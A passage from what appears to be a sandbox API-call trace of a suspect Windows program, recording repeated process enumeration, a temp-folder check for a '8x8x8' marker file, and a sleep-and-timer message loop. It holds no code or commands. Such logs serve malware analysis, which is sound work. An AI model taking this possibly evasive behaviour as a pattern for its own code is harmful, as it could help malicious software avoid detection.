th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0314.454] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0314.455] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0314.456] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.457] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.457] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.458] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.459] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.460] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0314.461] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.462] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.462] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0314.463] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0314.464] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0314.465] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0314.466] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.467] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0314.468] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0314.468] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0314.469] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0314.470] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0314.471] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0314.472] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0314.473] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0314.473] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0314.474] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0314.475] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0314.476] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0314.477] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0314.477] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0314.478] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0314.479] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0314.480] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0314.481] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0314.481] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0314.482] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.483] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0314.484] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.485] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0314.485] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0314.486] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0314.487] CloseHandle (hObject=0x294) returned 1 [0314.487] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0314.487] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0314.487] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0314.489] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0314.490] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0314.491] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0314.492] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0314.492] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0314.493] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0314.494] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0314.495] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0314.496] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0314.497] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0314.497] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.498] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.499] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.500] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.501] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.515] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0314.515] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0314.515] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0314.515] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0314.515] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0314.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0314.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0314.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0314.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0314.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0314.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0314.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0314.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0314.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0314.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0314.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0314.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0314.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0314.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0314.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0314.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0314.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0314.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0314.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0314.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0314.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0314.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0314.516] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0314.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0314.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0314.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0314.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0314.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0314.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0314.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0314.517] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0314.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0314.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0314.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0314.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0314.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0314.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0314.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0314.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0314.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0314.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0314.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0314.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0314.517] timeGetTime () returned 0x4e80c [0314.518] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.518] Sleep (dwMilliseconds=0xa) [0314.527] timeGetTime () returned 0x4e81b [0314.528] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.528] Sleep (dwMilliseconds=0xa) [0314.543] timeGetTime () returned 0x4e82b [0314.543] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.543] Sleep (dwMilliseconds=0xa) [0314.559] timeGetTime () returned 0x4e83b [0314.559] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0314.559] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0314.559] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0314.559] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0314.559] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0314.559] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.559] Sleep (dwMilliseconds=0xa) [0314.574] timeGetTime () returned 0x4e84a [0314.574] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.575] Sleep (dwMilliseconds=0xa) [0314.590] timeGetTime () returned 0x4e85a [0314.590] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.590] Sleep (dwMilliseconds=0xa) [0314.606] timeGetTime () returned 0x4e869 [0314.606] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.606] Sleep (dwMilliseconds=0xa) [0314.621] timeGetTime () returned 0x4e879 [0314.621] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.621] Sleep (dwMilliseconds=0xa) [0314.637] timeGetTime () returned 0x4e889 [0314.637] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 